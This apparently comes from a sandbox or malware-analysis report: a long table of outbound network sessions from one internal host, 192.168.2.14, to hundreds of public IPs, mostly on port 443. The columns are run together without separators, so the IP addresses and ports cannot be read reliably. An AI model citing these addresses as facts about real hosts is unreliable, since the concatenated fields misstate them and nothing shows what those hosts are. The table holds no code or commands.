                                                        14368192.168.2.1453538113.197.242.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14369192.168.2.1459756151.171.132.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14370192.168.2.1443314211.50.74.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14371192.168.2.145528635.216.90.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14372192.168.2.1434368205.73.48.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14373192.168.2.1436230144.156.93.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14374192.168.2.1443684156.84.225.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14375192.168.2.144184242.179.119.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14376192.168.2.1456802165.2.22.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14377192.168.2.1433006195.121.97.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14378192.168.2.145887439.54.171.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14379192.168.2.1454452101.148.115.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14380192.168.2.145267246.178.129.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14381192.168.2.14425909.94.73.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14382192.168.2.1440230199.177.120.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14383192.168.2.1442648119.225.136.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14384192.168.2.1450212108.223.91.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14385192.168.2.143372863.103.177.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14386192.168.2.144231031.18.209.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14387192.168.2.144260459.188.71.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14388192.168.2.1447798157.114.230.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14389192.168.2.144932859.0.189.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14390192.168.2.145477864.153.160.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14391192.168.2.143785844.202.109.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14392192.168.2.1445096149.11.213.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14393192.168.2.143740623.240.94.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14394192.168.2.144909670.221.152.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14395192.168.2.1443664195.121.130.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14396192.168.2.1437126154.95.50.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14397192.168.2.146078643.204.123.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14398192.168.2.1434470196.161.78.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14399192.168.2.144745885.86.102.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14400192.168.2.1448152107.252.225.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14401192.168.2.1433312220.218.82.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14402192.168.2.143361099.201.102.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14403192.168.2.144234886.194.120.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14404192.168.2.1440794155.246.26.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14405192.168.2.1456670175.219.171.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14406192.168.2.1436522116.101.16.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14407192.168.2.1442714208.207.251.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14408192.168.2.145517297.187.221.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14409192.168.2.143688666.125.157.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14410192.168.2.1458858135.21.2.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14411192.168.2.144948697.53.158.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14412192.168.2.144269071.61.106.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14413192.168.2.1438662105.191.112.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14414192.168.2.145544036.86.94.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14415192.168.2.143381291.187.157.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14416192.168.2.145118620.141.154.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14417192.168.2.14568484.50.243.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14418192.168.2.1440852125.238.40.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14419192.168.2.1433170221.213.3.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14420192.168.2.1449364162.9.177.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14421192.168.2.1445558120.153.121.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14422192.168.2.143703443.189.115.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14423192.168.2.143772046.115.91.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14424192.168.2.1432968135.143.46.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14425192.168.2.1456276219.97.173.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14426192.168.2.1450412155.108.252.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14427192.168.2.144170287.228.175.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14428192.168.2.1452094198.212.4.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14429192.168.2.146056835.245.136.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14430192.168.2.1459262131.169.46.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14431192.168.2.144027463.254.53.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14432192.168.2.1445150210.5.102.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14433192.168.2.1441554105.158.98.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14434192.168.2.1435670151.2.99.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14435192.168.2.1457950185.39.168.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14436192.168.2.1449458119.97.25.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14437192.168.2.145967651.217.107.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14438192.168.2.143593046.100.74.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14439192.168.2.1435190182.64.164.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14440192.168.2.1460514213.53.127.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14441192.168.2.1449876164.109.200.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14442192.168.2.144121632.88.209.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14443192.168.2.1451108145.117.131.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14444192.168.2.1453658145.156.116.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14445192.168.2.145561825.33.146.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14446192.168.2.145139868.244.173.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14447192.168.2.1449988136.41.7.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14448192.168.2.145992877.34.250.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14449192.168.2.1445132187.121.103.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14450192.168.2.1450056207.56.50.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14451192.168.2.1452786170.193.250.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14452192.168.2.143470284.135.89.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14453192.168.2.144739451.48.225.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14454192.168.2.1444568118.228.36.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14455192.168.2.143336296.137.131.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14456192.168.2.145891268.197.112.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14457192.168.2.1441696181.111.233.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14458192.168.2.1448824148.93.147.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14459192.168.2.1457112187.239.122.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14460192.168.2.1452716187.62.161.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14461192.168.2.144590657.66.211.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14462192.168.2.144308217.223.222.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14463192.168.2.1443502147.225.65.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14464192.168.2.143682880.167.188.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14465192.168.2.1442894219.91.242.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14466192.168.2.14597222.105.32.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14467192.168.2.1446856136.200.63.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14468192.168.2.145907053.209.180.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14469192.168.2.1450124120.129.150.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14470192.168.2.143853091.247.193.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14471192.168.2.1460036112.41.63.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14472192.168.2.145074632.224.157.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14473192.168.2.143666037.191.26.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14474192.168.2.1436340144.113.205.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14475192.168.2.14455605.150.85.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14476192.168.2.1445444196.238.21.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14477192.168.2.1442704184.7.132.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14478192.168.2.1442032183.228.249.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14479192.168.2.144669692.83.54.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14480192.168.2.145541269.252.123.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14481192.168.2.14479142.250.178.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14482192.168.2.1459040168.103.95.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14483192.168.2.1443896222.191.62.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14484192.168.2.1456822130.231.85.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14485192.168.2.1439118110.64.104.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14486192.168.2.1456192223.132.187.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14487192.168.2.1438336172.80.248.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14488192.168.2.1432944202.104.49.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14489192.168.2.1458250138.246.95.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14490192.168.2.1437556169.252.134.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14491192.168.2.1437196220.164.206.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14492192.168.2.1456886134.227.118.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14493192.168.2.1458198132.38.108.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14494192.168.2.144177435.235.141.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14495192.168.2.144012612.15.197.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14496192.168.2.1436320129.151.194.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14497192.168.2.145286238.207.91.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14498192.168.2.1439242190.253.64.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14499192.168.2.1441908157.47.0.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14500192.168.2.1433784195.137.14.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14501192.168.2.1460896156.36.143.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14502192.168.2.1437034223.76.168.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14503192.168.2.145238275.144.125.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14504192.168.2.1437558138.192.106.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14505192.168.2.1458008181.14.1.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14506192.168.2.1453874222.85.112.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14507192.168.2.1459176182.189.142.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14508192.168.2.145763052.215.1.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14509192.168.2.145679468.183.197.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14510192.168.2.1448420167.106.151.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14511192.168.2.145117677.145.195.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14512192.168.2.1452436162.131.1.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14513192.168.2.1437168188.228.108.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14514192.168.2.1454436199.229.179.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14515192.168.2.1452006204.162.109.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14516192.168.2.144535839.195.163.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14517192.168.2.1437100183.75.239.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14518192.168.2.1445670220.99.184.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14519192.168.2.1458998110.144.79.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14520192.168.2.14506681.25.180.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14521192.168.2.145152289.200.213.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14522192.168.2.145430238.219.28.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14523192.168.2.1443632211.26.39.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14524192.168.2.145774031.180.251.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14525192.168.2.1441772141.213.135.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14526192.168.2.1436536140.222.49.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14527192.168.2.144332434.239.59.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14528192.168.2.143350888.39.251.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14529192.168.2.1458934213.206.147.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14530192.168.2.145180224.165.130.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14531192.168.2.1453640140.220.157.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14532192.168.2.1440360174.24.162.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14533192.168.2.144921835.224.24.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14534192.168.2.1437784152.103.149.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14535192.168.2.1458830218.214.86.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14536192.168.2.1442602140.212.153.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14537192.168.2.14332804.191.190.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14538192.168.2.143710845.201.57.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14539192.168.2.1432838149.118.26.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14540192.168.2.1446930101.148.88.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14541192.168.2.144692843.212.37.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14542192.168.2.143780680.99.168.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14543192.168.2.1454678206.2.79.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14544192.168.2.1434524166.218.197.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14545192.168.2.1438972185.44.241.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14546192.168.2.143296461.182.108.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14547192.168.2.1459416204.52.207.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14548192.168.2.145360245.241.109.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14549192.168.2.1460246151.39.13.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14550192.168.2.1439488150.254.26.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14551192.168.2.1450830190.129.164.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14552192.168.2.143862298.205.181.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14553192.168.2.1439724184.141.235.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14554192.168.2.1454242176.123.97.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14555192.168.2.1457408115.180.35.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14556192.168.2.1439438112.89.100.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14557192.168.2.1445970181.213.249.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14558192.168.2.1459656147.236.7.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14559192.168.2.1454030221.82.212.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14560192.168.2.145268081.220.135.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14561192.168.2.143722448.67.57.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14562192.168.2.1437030183.4.5.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14563192.168.2.145912494.35.165.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14564192.168.2.143639631.178.128.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14565192.168.2.1447572158.109.43.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14566192.168.2.1443284105.220.159.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14567192.168.2.1456502209.246.94.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14568192.168.2.145533694.42.179.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14569192.168.2.1448462159.194.161.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14570192.168.2.144877678.180.156.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14571192.168.2.1434214223.95.7.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14572192.168.2.1452498103.68.182.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14573192.168.2.143872259.157.55.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14574192.168.2.145168698.203.179.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14575192.168.2.1447966207.38.179.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14576192.168.2.1454832195.11.42.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14577192.168.2.1459192161.122.50.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14578192.168.2.143681038.63.94.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14579192.168.2.145376031.167.70.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14580192.168.2.1445022102.187.129.48443
